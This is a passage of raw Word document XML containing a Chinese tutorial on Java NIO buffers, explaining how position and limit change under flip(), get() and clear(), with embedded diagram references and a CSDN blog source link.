          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，即下一个将要被写入的字节索引为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>仍然是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00E2B" w:rsidRDefault="00F00E2B" w:rsidP="00F00E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5526157" cy="2114205"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="212" name="图片 4" descr="http://hi.csdn.net/attachment/201107/17/0_1310888701okkW.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hi.csdn.net/attachment/201107/17/0_1310888701okkW.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId119" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5528720" cy="2115185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00E2B" w:rsidRDefault="00F00E2B" w:rsidP="00F00E2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>下一步把读取的数据写入到输出通道中，相当于从缓冲区中读取数据，在此之前，必须调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>flip()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法，该方法将会完成两件事情：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00E2B" w:rsidRDefault="00F00E2B" w:rsidP="00F00E2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>设置为当前的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00E2B" w:rsidRDefault="00F00E2B" w:rsidP="00F00E2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>由于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>被设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，所以可以保证在下一步输出时读取到的是缓冲区中的第一个字节，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>被设置为当前的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，可以保证读取的数据正好是之前写入到缓冲区中的数据，如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00E2B" w:rsidRDefault="00F00E2B" w:rsidP="00F00E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4929809" cy="2009633"/>
            <wp:effectExtent l="19050" t="0" r="4141" b="0"/>
            <wp:docPr id="211" name="图片 5" descr="http://hi.csdn.net/attachment/201107/17/0_1310888706NqL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hi.csdn.net/attachment/201107/17/0_1310888706NqLk.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId120" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4934832" cy="2011681"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00E2B" w:rsidRDefault="00F00E2B" w:rsidP="00F00E2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>现在调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>get()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法从缓冲区中读取数据写入到输出通道，这会导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的增加而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>保持不变，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>不会超过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的值，所以在读取我们之前写入到缓冲区中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>个自己之后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的值都为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00E2B" w:rsidRDefault="00F00E2B" w:rsidP="00F00E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5128591" cy="2113045"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="210" name="图片 6" descr="http://hi.csdn.net/attachment/201107/17/0_1310888709lDHB.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hi.csdn.net/attachment/201107/17/0_1310888709lDHB.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId121" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5133784" cy="2115185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00E2B" w:rsidRDefault="00F00E2B" w:rsidP="00F00E2B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="326" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>在从缓冲区中读取数据完毕后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>的值仍然保持在我们调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>flip()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法时的值，调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>clear()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法能够把所有的状态变化设置为初始化时的值，如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F00E2B" w:rsidRDefault="00F00E2B" w:rsidP="00F00E2B">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="FangSong_GB2312" w:hAnsi="FangSong_GB2312" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5263763" cy="2010747"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="209" name="图片 7" descr="http://hi.csdn.net/attachment/201107/17/0_1310888714P87Y.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hi.csdn.net/attachment/201107/17/0_1310888714P87Y.gif"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId122" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5266205" cy="2011680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD4FAC" w:rsidRPr="00F41A4C" w:rsidRDefault="00AD4FAC" w:rsidP="004867CA">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C70C0" w:rsidRDefault="00DA54D7" w:rsidP="004867CA">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId123" w:history="1">
        <w:r w:rsidR="00720997" w:rsidRPr="00C40F39">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://blog.csdn.net/wuxianglong/article/details/6612282</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00720997" w:rsidRDefault="006752A9" w:rsidP="006752A9">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00720997" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="0089662E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Byte</w:t>
      </w:r>
      <w:r w:rsidR="00720997">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
